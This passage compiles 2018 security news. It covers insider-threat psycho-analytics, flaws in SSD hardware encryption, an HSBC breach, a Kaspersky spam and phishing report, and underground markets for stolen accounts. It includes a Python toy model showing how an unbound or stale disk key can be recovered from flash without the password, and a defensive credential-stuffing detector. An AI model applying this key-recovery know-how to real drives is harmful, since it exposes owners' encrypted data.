Element 15 is more creepy, but could be managed if implemented carefully. "Each employee responds to events and conditions in their work and personal lives differently -- that response, positive or negative, is a key concern for an InTP. A program with access to personnel with behavioral sciences expertise, either through internal D/A or affiliated resources, can strengthen its capabilities to identify and assess types of concerning behavior, contextualize the behavior, discern unconscious biases and propose alternative hypotheses."

This draws on the expanding field of behavioral science. It would require monitoring staff emails and chats, but has the advantage of being, or at least appearing to be, impersonal. In 2017, a paper published by the Intelligence and National Security Alliance (INSA) suggested that psycholinguistic analysis could detect the development of an insider threat before the threat becomes a reality.

The paper discusses what it calls counterproductive work behaviors (CWBs). It asserts that malicious insiders do not start work as malicious insiders, but that life and work pressures and stresses create them. Escalating CWBs can be detected through psycholinguistic analysis of emails, personal blogs, chats and tweets -- the theory being that an unhappy employee can be detected and helped before he or she becomes a malicious insider employee.

Despite concerns that private industry should perhaps not attempt to transpose the Framework verbatim into the workplace, there is nevertheless much that is good that could form the basis of good practice in insider threat protection. While it has been designed for government departments and agencies, it could still be useful to private organizations if they cherry-pick.

Psycho-Analytics Could Aid Insider Threat Detection
7.11.2018 securityweek 

Psycho-Analytics Could Help Detect Future Malicious Behavior

The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed through Congress unamended in January 2017.

The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.

One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider by using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.

Psycho-analytics Used for Insider Threat Detection

Traditional security controls, such as access control and DLP, have some, but limited, effect. In recent years, these have been supplemented by user behavior analytics (UBA), using machine learning to detect anomalous user behavior within the network.

"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."

Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."

This week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that physical user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just the baseline of acceptable behavior on the network, but incorporate the psychological effect of life events both inside and outside of the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and be able to predict malicious behavior before it happens.

The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology: machine learning (ML) and artificial intelligence (AI).

This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.

Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.

Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.

Using existing studies, such as the Diagnostic and Statistical Manual of Mental Disorders Vol. 5 (DSM-5), INSA provides a table of stressors and potentially linked CWBs. For example, emotional stress at the minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.

But it still suffers from one weakness: where the stressors that affect the user's work occur entirely outside of the workplace, such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.

"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."

The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.

In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post before the event, but from the chat logs of his conversation with Lamo in May 2010 (see Wired) after WikiLeaks had started publishing the documents. The linguistic analysis in this case might have helped explain Manning's actions, but could do nothing to forewarn the authorities.

The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."

Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior

Researchers Break Full-Disk Encryption of Popular SSDs
7.11.2018 securityweek

The encryption mechanism used by several types of solid state drives contains vulnerabilities that an attacker could exploit to access encrypted data without knowing a password.

The issues were discovered by Carlo Meijer and Bernard van Gastel from the Radboud University in the Netherlands and impact popular drives from Samsung and Crucial. The bugs impact both internal and external drives, the researchers explain in a paper (PDF).

Hardware encryption is meant to address weaknesses in software encryption and is performed on the drive itself, usually through a dedicated AES co-processor, with the drive’s firmware in charge of key management.

Full-disk encryption software could even switch off when hardware encryption is available, and rely solely on the latter. This is what Microsoft Windows’ BitLocker does, meaning that the data is not encrypted at all if hardware encryption fails.

When it comes to the implementation of a full-disk encryption scheme, there are pitfalls that should be avoided, such as not linking the user password and the disk encryption key (DEK), using a single DEK for the entire disk, or not using enough entropy in randomly generated DEKs.

Wear levelling could also prove an issue, if the DEK is initially stored unprotected and not overwritten after encryption. Similarly, DEVSLP (device sleep) could prove problematic, if the drive writes its internal state to non-volatile memory and the memory is not erased upon wake-up, as it would allow an attacker to extract the DEK from the last stored state.
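To make the binding and wear-levelling pitfalls concrete, here is an added model written for this page, not code from the Radboud paper or from any vendor's firmware; the Drive, Flash and audit_nvram_for_dek names and the HMAC-based toy cipher are this example's own inventions. It models three designs: a DEK stored in the clear behind a password gate, a DEK stored only wrapped under a password-derived key, and that wrapped design with an un-erased factory copy of the DEK left in a stale flash page.

```python
"""Toy model of two pitfalls named above: a DEK not bound to the user password,
and a factory copy of the DEK that wear levelling leaves behind. Added
illustration for this page, not code from the Radboud paper or any drive
firmware. Flash is modelled append-only (a rewrite never overwrites the old
page), which is what lets a stale copy survive. audit_nvram_for_dek() plays
someone who can dump every flash page but lacks the password. The DEK wrap
and the sector cipher are HMAC-SHA256 in counter mode, a standard-library
stand-in for the AES modes real drives use."""
import hashlib
import hmac
import os

DEK_LEN = 32
KDF_ITERS = 20_000  # deliberately low so the demo runs quickly

def derive_kek(password: bytes, salt: bytes) -> bytes:
    """Key-encryption key derived from the user password (PBKDF2-HMAC-SHA256)."""
    return hashlib.pbkdf2_hmac("sha256", password, salt, KDF_ITERS, dklen=32)

def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    out, ctr = b"", 0
    while len(out) < n:  # counter-mode keystream from HMAC-SHA256 (toy cipher)
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), "sha256").digest()
        ctr += 1
    return out[:n]

def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wrap_dek(kek: bytes, dek: bytes) -> bytes:
    """Encrypt-then-MAC the DEK under the KEK: only the password unwraps it."""
    nonce = os.urandom(16)
    ct = _xor(dek, _keystream(kek, nonce, len(dek)))
    return nonce + ct + hmac.new(kek, nonce + ct, "sha256").digest()

def unwrap_dek(kek: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:16 + DEK_LEN], blob[16 + DEK_LEN:]
    if not hmac.compare_digest(hmac.new(kek, nonce + ct, "sha256").digest(), tag):
        raise PermissionError("wrong password")
    return _xor(ct, _keystream(kek, nonce, len(ct)))

def crypt_sector(dek: bytes, lba: int, data: bytes) -> bytes:
    """Sector cipher keyed by the DEK; XOR stream, so one call does both ways."""
    return _xor(data, _keystream(dek, lba.to_bytes(8, "big"), len(data)))

class Flash:  # append-only page store: nothing is ever overwritten in place
    def __init__(self):
        self.pages = []  # (name, value) pairs; stale pages stay until scrubbed
    def write(self, name: str, value) -> None:
        self.pages.append((name, value))
    def read(self, name: str):  # newest page wins, like a flash translation layer
        return next((v for n, v in reversed(self.pages) if n == name), None)
    def scrub(self, name: str) -> None:  # physically erase live AND stale pages
        self.pages = [(n, v) for n, v in self.pages if n != name]

class Drive:
    """bound=False: DEK stored in the clear, the password only gates unlock.
    bound=True: DEK stored only wrapped under the password-derived KEK.
    scrub=False: the factory DEK page is tombstoned, never erased (wear levelling)."""

    def __init__(self, password: bytes, bound: bool, scrub: bool = True):
        self.flash, salt, dek = Flash(), os.urandom(16), os.urandom(DEK_LEN)
        self.bound = bound
        self.flash.write("salt", salt)
        self.flash.write("dek", dek)  # factory state: encrypting, no password yet
        if bound:
            self.flash.write("wrapped_dek", wrap_dek(derive_kek(password, salt), dek))
            if scrub:
                self.flash.scrub("dek")
            else:
                self.flash.write("dek", None)  # logical delete; old page survives
        else:
            self.flash.write("verifier", derive_kek(password, salt))

    def unlock(self, password: bytes) -> bytes:
        kek = derive_kek(password, self.flash.read("salt"))
        if self.bound:
            return unwrap_dek(kek, self.flash.read("wrapped_dek"))
        if not hmac.compare_digest(kek, self.flash.read("verifier")):
            raise PermissionError("wrong password")
        return self.flash.read("dek")

def audit_nvram_for_dek(drive, lba: int, ciphertext: bytes, known_plaintext: bytes):
    """Without the password: does any DEK-sized flash value decrypt the sector?"""
    for _, value in drive.flash.pages:
        if isinstance(value, bytes) and len(value) == DEK_LEN:
            if crypt_sector(value, lba, ciphertext) == known_plaintext:
                return value
    return None

def demo() -> dict:
    """{model: DEK recoverable without the password?} for one sector per model."""
    pw, data = b"correct horse", b"boot sector header".ljust(32, b"\0")
    drives = {"unbound": Drive(pw, bound=False), "bound": Drive(pw, bound=True),
              "bound_stale_copy": Drive(pw, bound=True, scrub=False)}
    return {n: audit_nvram_for_dek(d, 0, crypt_sector(d.unlock(pw), 0, data), data)
            is not None for n, d in drives.items()}
```

demo() returns {'unbound': True, 'bound': False, 'bound_stale_copy': True}: only the design that both binds the DEK to the password and physically scrubs the factory copy keeps the key out of a flash dump.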

The researchers investigated the security of various popular SSD models and discovered that their encryption schemes are impacted by one or more of these issues.

Crucial MX100 and MX200, for example, lack cryptographic binding between password and DEK, meaning that decryption is possible without actually providing the user-password. This is true for both ATA security and Opal standard implementations that are supported by the models.

“The scheme is essentially equivalent to no encryption, as the encryption key does not depend on secrets,” the researchers note.

The drives also support a series of vendor-specific commands that engineers use to interact with the device, but which need to be unlocked first. However, the researchers discovered it was trivial to unlock these commands, which allows for code execution on the device.

On the Samsung 840 EVO, a SATA SSD released in 2013, the ATA password may be cryptographically bound to the DEK, and no weakness was identified in the TCG Opal implementation, the researchers say. However, it would be possible to recover the DEK due to the wear levelling mechanism.

However, the ATA security mechanism can be tricked into revealing the drive content, and this issue was also found to impact the Samsung 850 EVO (released in 2014). The newer model is not vulnerable to the wear levelling attack, and no weaknesses were found in its TCG Opal implementation.

On the Samsung T3 USB external disk, however, there was no cryptographic binding between password and DEK, an issue present on the Samsung T5 portable as well.

“The results presented in this paper show that one should not rely solely on hardware encryption as offered by SSDs for confidentiality. We recommend users that depend on hardware encryption implemented in SSDs to employ also a software full-disk encryption solution, preferably an open-source and audited one,” the researchers note.

“A pattern of critical issues across vendors indicates that the issues are not incidental but structural, and that we should critically assess whether this process of standards engineering actually benefits security, and if not, how it can be improved,” they also point out.

The vulnerabilities were reported to the affected vendors half a year ago but made public only now. Samsung has publicly acknowledged the flaws and also issued firmware updates to address them on the portable SSDs.

HSBC Bank USA Warns Customers of Data Breach
7.11.2018 securityweek 

Unknown attackers were able to access online accounts of HSBC Bank USA users in the first half of October, the bank told customers in a letter.

The data breach happened between October 4 and October 14, and prompted the United States subsidiary of UK-based HSBC to block access to online accounts, to prevent further unauthorized access, the letter the bank sent to customers (PDF) reveals.

“When HSBC discovered your online account was impacted, we suspended online access to prevent further unauthorized entry of your account. You may have received a call or email from us so we could help you change your online banking credentials and access your account,” HSBC explains.

The notice also reveals the large amount of data that was exposed to the attackers when they accessed the online accounts.

“The information that may have been accessed includes your full name, mailing address, phone number, email address, date of birth, account numbers, account types, account balances, transaction history, payee account information, and statement history where available,” the letter reads.

Following the incident, the bank also decided to enhance the authentication process for HSBC Personal Internet Banking with the addition of an extra layer of security. The organization is also providing impacted customers with credit monitoring and identity theft protection.

Impacted customers are also advised to monitor their accounts for any unauthorized activity and to contact the bank if they notice anything suspicious. They should also place a fraud alert on their credit files, so that creditors contact them before processing any new request in their name.

Periodically obtaining credit reports and informing law enforcement of any suspicious activity should also help the bank’s users avoid losses.

This data breach is not the first cyber incident involving HSBC. Last year, the bank’s users were targeted with fake security software, while in 2016 a crippling distributed denial of service (DDoS) attack knocked its systems offline for hours.

Spam and phishing in Q3 2018
7.11.2018 Kaspersky

Quarterly highlights
Personal data in spam
We have often said that personal data is candy on a stick to fraudsters and must be kept safe (that is, not given out on dubious websites). It can be used to gain access to accounts and in targeted attacks and ransomware campaigns.

In Q3, we registered a surge of fraudulent emails in spam traffic. We already reported on this type of scam at the beginning of the year: a ransom (in bitcoins) is demanded in exchange for not disclosing “damaging evidence” concerning the recipient. The new wave of emails contained users’ actual personal data (names, passwords, phone numbers), which the scammers used to try to convince victims that they really had the information specified in the message. The spam campaign was carried out in several stages, and it is likely that the fraudsters made use of a range of personal information databases, as evidenced, for example, by the telephone number formats that varied from stage to stage.

Whereas before, the target audience was primarily English-speaking, in September we logged a spate of mailings in other languages, including German, Italian, Arabic, and Japanese.

The amount demanded by the ransomers ranged from a few hundred to several thousand dollars. To collect the payments, different Bitcoin wallets were used, which changed from mailing to mailing. In July, 17 transactions worth more than 3 BTC ($18,000 at the then exchange rate) were made to one such wallet.

Transactions to scammers’ Bitcoin wallets

Also in Q3, we detected a malicious spam campaign aimed at corporate users. The main target was passwords (for browsers, instant messengers, email and FTP clients, cryptocurrency wallets, etc.). The cybercriminals attempted to infect victim computers with Loki Bot malware, concealing it in ISO files attached to messages. The latter were made to look like business correspondence or notifications from well-known companies.

Malicious spam attacks against the banking sector
The owners of the Necurs botnet, which in Q2 was caught sending malicious emails with IQY (Microsoft Excel Web Query) attachments, turned their attention to the banking sector and, like in Q2, used a non-typical file format for spam, this time PUB (Microsoft Publisher). Messages were sent to the email addresses of credit institutions in different countries, and the PUB file attachments contained Trojan loaders for downloading executable files (detected as Backdoor.Win32.RA-based) onto victim computers.

We observed that the owners of Necurs are making increasing use of various techniques to bypass security solutions and send malicious spam containing attachments with non-typical extensions so as not to arouse users’ suspicion.

New iPhone launch
Late Q3 saw the release of Apple’s latest gizmo. Unsurprisingly, it coincided with a spike in email spam from Chinese “companies” offering Apple accessories and replica gadgets. Links in such messages typically point to a recently created, generic online store. Needless to say, having transferred funds to such one-day websites, you lose your money and your goods never arrive.

The release also went hand in hand with a slight rise in both the number of phishing schemes exploiting Apple (and its services) and messages with malicious attachments:

Classic pharma spam in a new guise
Spammers are constantly looking for ways to get round mail filters and increase the “deliverability” of their offers. To do so, they try to fabricate emails (both the contents and technical aspects) that look like messages from well-known companies and services. For example, they copy the layout of banking and other notifications and add bona fide headers in the fields that the user is sure to see.

Such techniques, typical of phishing and malicious campaigns, are being used more often in “classic spam” – for example, in messages offering prohibited medicines. For instance, this past quarter we detected messages disguised as notifications from major social networks, including LinkedIn. The messages contained a phoney link that we expected to point to a phishing form asking for personal data, but instead took us to a drug store.

Spammers have adopted this new approach because this type of spam in its traditional form has long been detectable by anti-spam solutions, so they started using disguises. We expect this trend to pick up steam.

Since the start of the academic year, scammers’ interest in gaining access to accounts on university websites has risen. We registered attacks against 131 universities in 16 countries worldwide. Cybercriminals want to get their hands on both personal data and academic research.

Fake login pages to personal accounts on university websites

Job search
To harvest personal data, attackers also exploit the job search. Pages with application forms lure victims with tempting offers of careers in a big-name company, a large salary, and the like.

Propagation methods
This quarter we again focus on the ways in which phishing and other illegitimate content is distributed by cybercriminals. But this time we also want to draw attention to methods that are gaining popularity and being actively exploited by attackers.

Scam notifications
Some browsers make it possible for websites to send notifications to users (for example, Push API in Chrome), and this technology has not gone unnoticed by cybercriminals. It is mainly deployed by websites that collaborate with various partner networks. With the aid of pop-up notifications, users are lured onto “partner” sites, where they are prompted to enter, for example, personal data. The owners of the resource receive a reward for every user they process.

By default, Chrome requests permission to enable notifications for each individual site, so to nudge the user into an affirmative decision, the attackers state that the page cannot continue loading without a click on the Allow button.

Having given the site permission to display notifications, many users simply forget about it, so when a pop-up message appears on the screen, they don’t always understand where it came from.

Notifications are tailored to the user’s location and displayed in the appropriate language

The danger is that notifications can appear when the user is visiting a trusted resource. This can mislead the victim as regards the source of the message: everything seems to suggest it came from the trusted site currently open. The user might see, for instance, a “notification” about a funds transfer, giveaway, or tasty offer. They all generally lead to phishing sites, online casinos, or sites with fake giveaways and paid subscriptions:

Examples of sites that open when users click on a notification

Clicking on a notification often leads to an online gift card generator, which we covered earlier in the quarter (it also works in the opposite direction: the resource may prompt to enable push notifications). Such generators offer visitors the chance to generate free gift card codes for popular online stores. The catch is that in order to get the generated codes, the visitor needs to prove their humanness by following a special link. Instead of receiving a code, the user is sent on a voyage through a long chain of partner sites with invitations to take part in giveaways, fill out forms, download stuff, sign up for paid SMS mailings, and much more.

The use of media resources is a rather uncommon, yet effective way of distributing fraudulent content. This point is illustrated by the story of the quite popular WEX cryptocurrency exchange, which prior to 2017 went by the name of BTC-E. In August 2018, fake news was inserted into thematic “third tier” Russian media saying that, due to internal problems, the exchange was changing its domain name to wex.ac:

The wex.nz administration soon tweeted (its tweets are published on the exchange’s home page) that wex.ac was just another imitator and warned users about transferring funds.

But that did not stop the scammers, who released more news about the exchange moving to a new domain. This time to the .sc zone:

Among the social media platforms used by scammers to distribute content, Instagram warrants a special mention. Only relatively recently have cybercriminals started paying attention to it. In Q3 2018, we came across many fake US Internal Revenue Service user accounts in this social network, as well as many others purporting to be an official account of one of the most widely-used Brazilian banks.

Fake IRS accounts on Instagram

Scammers not only create fakes, but seek access to popular accounts: August this year saw a wave of account hacking sweep through the social network. We observed accounts changing owners as a result of phishing attacks with “account verification” prompts – users themselves delivered their credentials on a plate in the hope of getting the cherished blue tick.

Back when scammers offered to “verify” accounts, there was no such function in the social network: the administration itself decided whom to award the sacred “badge.” Now it is possible to apply for one through the account settings.

Statistics: spam
Proportion of spam in email traffic

Proportion of spam in global email traffic, Q2 and Q3 2018

In Q3 2018, the largest share of spam was recorded in August (53.54%). The average percentage of spam in global mail traffic was 52.54%, up 2.88 p.p. against the previous reporting period.

Sources of spam by country

Sources of spam by country, Q3 2018

The three leading source countries for spam in Q3 were the same as in Q2 2018: China is in first place (13.47%), followed by the USA (10.89%) and Germany (10.37%). Fourth place goes to Brazil (6.33%), and fifth to Vietnam (4.41%). Argentina (2.64%) rounds off the Top 10.

Spam email size

Spam email size, Q2 and Q3 2018

In Q3 2018, the share of very small emails (up to 2 KB) in spam fell by 5.81 p.p. to 73.36%. The percentage of emails sized 5-10 KB increased slightly compared to Q2 (+0.76 p.p.) and amounted to 6.32%. Meanwhile, the proportion of 10-20 KB emails dropped by 1.21 p.p. to 2.47%. The share of 20-50 KB spam messages remained virtually unchanged, climbing a mere 0.49 p.p. to 3.17%.

Malicious attachments: malware families

Top 10 malicious families in mail traffic, Q3 2018

According to the results of Q3 2018, the most common malware in mail traffic was still objects assigned the verdict Exploit.Win32.CVE-2017-11882, adding 0.76 p.p. since the last quarter (11.11%). The Backdoor.Win32.Androm bot was encountered more frequently than in the previous quarter and ranked second (7.85%), while Trojan-PSW.Win32.Fareit dropped to third place (5.77%). Fourth and fifth places were taken by Worm.Win32.WBVB and Backdoor.Java.QRat, respectively.

Countries targeted by malicious mailshots

Countries targeted by malicious mailshots, Q3 2018 (download)

The Top 3 countries by number of Mail Anti-Virus triggers in Q3 remain unchanged since the start of the year: Germany took first place (9.83%), with Russia in second (6.61%) and the UK in third (6.41%). They were followed by Italy in fourth (5.76%) and Vietnam in fifth (5.53%).

Statistics: phishing
In Q3 2018, the Anti-Phishing system prevented 137,382,124 attempts to direct users to scam websites. 12.1% of all Kaspersky Lab users worldwide were subject to attack.

Geography of attacks
The country with the highest percentage of users attacked by phishing in Q3 2018 was Guatemala with 18.97% (+8.56 p.p.).

Geography of phishing attacks, Q3 2018 (download)

Q2’s leader Brazil dropped to second place, with 18.62% of users in this country attacked during the reporting period, up 3.11 p.p. compared to Q2. Third and fourth places went to Spain (17.51%) and Venezuela (16.75%), with Portugal rounding off the Top 5 (16.01%).

Country      %*
Guatemala    18.97
Brazil       18.62
Spain        17.51
Venezuela    16.75
Portugal     16.01
China        15.99
Australia    15.65
Panama       15.33
Georgia      15.10
Ecuador      15.03
* Share of users on whose computers Anti-Phishing was triggered, out of all Kaspersky Lab users in the country

Organizations under attack
The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.
As in the previous quarter, the Global Internet Portals category was in first place, bumping its share up to 32.27% (+7.27 p.p.).

Distribution of organizations whose users were attacked by phishers, by category, Q3 2018 (download)

Only organizations grouped into a general Finance category were attacked more often than global Internet portals. This provisional category accounted for 34.67% of all attacks (-1.03 p.p.), with banks at 18.26% and payment systems at 9.85%. The one change lower down the ranking was that online stores (6.56%) conceded fourth place to IT companies (6.91%).

In Q3 2018, the average share of spam in global mail traffic rose by 2.88 p.p. to 52.54%, and the Anti-Phishing system prevented more than 137 million redirects to phishing sites, up 30 million against the previous reporting period.

Spammers and phishers continue to exploit big news stories. This quarter, for instance, great play was made of the release of the new iPhone. The search for channels to distribute fraudulent content also continued. Alongside an uptick in Instagram activity, we spotted fake notifications from websites and the spreading of fake news through media resources.

A separate mention should go to the expanding geography of ransomware spam, featuring the use of victims’ real personal data.

Hey there! How much are you worth?
7.11.2018 Kaspersky
Hacking

Have you ever stopped to think just how much your life is worth? I mean really think about it. For instance, let’s say you wanted to sell everything you have – your house, your car, your job, your private life, photos and home movies from your childhood, your accounts on various social media, your medical history and so on – how much would you ask for it all?

I thought about this myself and just the thought that someone else would be able to, for example, read the personal things I’ve written to friends, family and lovers on Facebook made me realize that those things are priceless. The same goes for someone getting access to my email and basically having the power to reset all my passwords for all the accounts I’ve registered using that email.

In the real non-digital world there are lots of insurance policies that cover things if they get damaged or stolen. If someone steals my car or I break my TV, I can replace them if they were insured. We don’t really have that option in the digital world, and our digital life contains some very personal and sentimental information. The big difference is that our digital lives can never be erased – what we’ve said or written, pictures we’ve sent, or orders we’ve made are basically stored forever in the hands of the service providers.

I decided to investigate the black market and see what kind of information is being sold there. We all know that you can buy drugs, weapons and stolen goods there, but you can also buy online identities. How much do you think your online identity is worth?

Hacked accounts
When investigating hacked accounts from popular services it’s almost impossible to compile valid data because there are so many black-market vendors selling this stuff. It is also difficult to verify the uniqueness of the data being sold. But one thing is certain – this is the most popular type of data being sold on the black market. When talking about data from popular services, I’m referring to things like stolen social media accounts, banking details, remote access to servers or desktops and even data from popular services like Uber, Netflix, Spotify and tons of gaming websites (Steam, PlayStation Network, etc.), dating apps and porn websites.

The most common way to steal this data is via phishing campaigns or by exploiting a web-related vulnerability such as an SQL injection vulnerability. The password dumps contain an email and password combination for the hacked services, but as we know most people reuse their passwords. So, even if a simple website has been hacked, the attackers might get access to accounts on other platforms by using the same email and password combination.

These kinds of attacks are not very sophisticated, but they are very effective. It also shows that cybercriminals are making money from hackers and hacktivists; the people selling these accounts are most likely not the people who hacked and distributed the password dump.
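The password reuse described above shows up on the defender’s side as credential stuffing: one source replaying leaked email/password pairs against many different accounts. As an added example that is not part of the original article, the Python below runs a simple detector over constructed authentication log lines (a hypothetical, simplified format, not taken from any real product) and flags sources that cycle through many distinct usernames inside a short window, which is what distinguishes stuffing from a single-account brute force.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines in a hypothetical, simplified auth-log format
# (not taken from any real system): timestamp, result, username, source IP.
SAMPLE_LOG = """\
2018-10-03T10:00:01Z LOGIN_FAIL user=alice src=203.0.113.7
2018-10-03T10:00:02Z LOGIN_FAIL user=bob src=203.0.113.7
2018-10-03T10:00:02Z LOGIN_FAIL user=carol src=203.0.113.7
2018-10-03T10:00:03Z LOGIN_OK user=dave src=203.0.113.7
2018-10-03T10:00:04Z LOGIN_FAIL user=erin src=203.0.113.7
2018-10-03T10:00:05Z LOGIN_FAIL user=frank src=203.0.113.7
2018-10-03T10:00:06Z LOGIN_FAIL user=grace src=203.0.113.7
2018-10-03T10:01:00Z LOGIN_FAIL user=alice src=198.51.100.9
2018-10-03T10:01:05Z LOGIN_FAIL user=alice src=198.51.100.9
2018-10-03T10:01:09Z LOGIN_OK user=alice src=198.51.100.9
2018-10-03T11:30:00Z LOGIN_OK user=heidi src=192.0.2.44
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<result>LOGIN_OK|LOGIN_FAIL)\s+"
    r"user=(?P<user>\S+)\s+src=(?P<src>\S+)$"
)


def parse_log(text):
    """Parse lines into (timestamp, result, user, src) tuples; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m.group("result"), m.group("user"), m.group("src")))
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=5), min_users=5):
    """Flag source IPs that try at least `min_users` *distinct* usernames within
    `window`. One username hammered repeatedly is a brute force, not stuffing,
    and is deliberately not flagged by this rule."""
    by_src = defaultdict(list)
    for ts, result, user, src in sorted(events):
        by_src[src].append((ts, result, user))

    alerts = {}
    for src, evs in by_src.items():
        best = None
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until the span fits inside `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            span = evs[start:end + 1]
            users = {u for _, _, u in span}
            if len(users) >= min_users and (best is None or len(users) > best["distinct_users"]):
                best = {
                    "distinct_users": len(users),
                    "attempts": len(span),
                    # Accounts the attacker actually got into: these are the ones to reset.
                    "successes": sorted({u for _, r, u in span if r == "LOGIN_OK"}),
                }
        if best:
            alerts[src] = best
    return alerts


if __name__ == "__main__":
    for src, info in detect_credential_stuffing(parse_log(SAMPLE_LOG)).items():
        print(src, info)
```

On the constructed data, 203.0.113.7 is flagged (seven different accounts in six seconds, one of them successfully), while 198.51.100.9, which retries one account three times, is not; a separate per-account lockout rule would cover that case.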

The price for these hacked accounts is very cheap, with most selling for about $1 per account, and if you buy in bulk, you’ll get them even cheaper.

Some vendors even give a lifetime warranty, so if one account stops working, you receive a new account for free. For example, below is a screenshot that shows a vendor selling Netflix accounts.

100 000 email and password combinations

250 000 email and password combinations

Passports and identity papers
When lurking around underground marketplaces I saw a lot of other information being traded, such as fake passports, driving licenses and ID cards/scans. This is where things get a bit more serious – most of the identity papers are not stolen, but they can be used to cause problems in the non-digital world.

People can use your identity with a fake ID card to acquire, for example, phone subscriptions, open bank accounts and so on.

Below is a screenshot of a person selling a registered Swedish passport, and the price is $4000. The same vendor was offering passports from almost all European countries.

Scammers’ toolbox
Most of the items being sold in the underground marketplaces are not new to me; they are all things the industry has been talking about for a very long time. What was interesting was the fact that stolen or fake invoices and other papers/scans such as utility bills were being sold.

People actually steal other people’s mail and collect invoices, for example, which are then used to scam other people. They will collect and organize these invoices by industry and country. The vendors then sell these scans as part of a scammer toolbox.

A scammer can use these scans to target victims in specific countries and even narrow their attacks down to gender, age and industry.

During the research I got to thinking about a friend’s (Inbar Raz) research on Tinder bots and, through my research, I managed to find links between stolen accounts and Tinder bots. These bots are used to earn even more money from stolen accounts. So, the accounts are not just sold on the black market, they are also used in other cybercriminal activities.

What’s interesting about the fake Tinder profiles is that they have the following characteristics in common that make them easy to identify:

Lots of matches all at once.
Most of the women look like super models.
No job title or education info.
Stolen Instagram pictures/images but with info stolen from Facebook accounts.
Scripted chat messages.
Most of the bots that I’ve researched are related to traffic redirection, clickbait, spam and things like that. So far, I haven’t seen any malware – most of the bots will try to involve you in other crime or to steal your data. Here’s an example of what it might look like.

The first step is that you’re matched with the bot. The bot doesn’t always contact you directly, but waits for you to interact with it before it replies. In some cases the introduction is scripted with some text about how it wants to show you nude photos or something similar and then it posts a link.

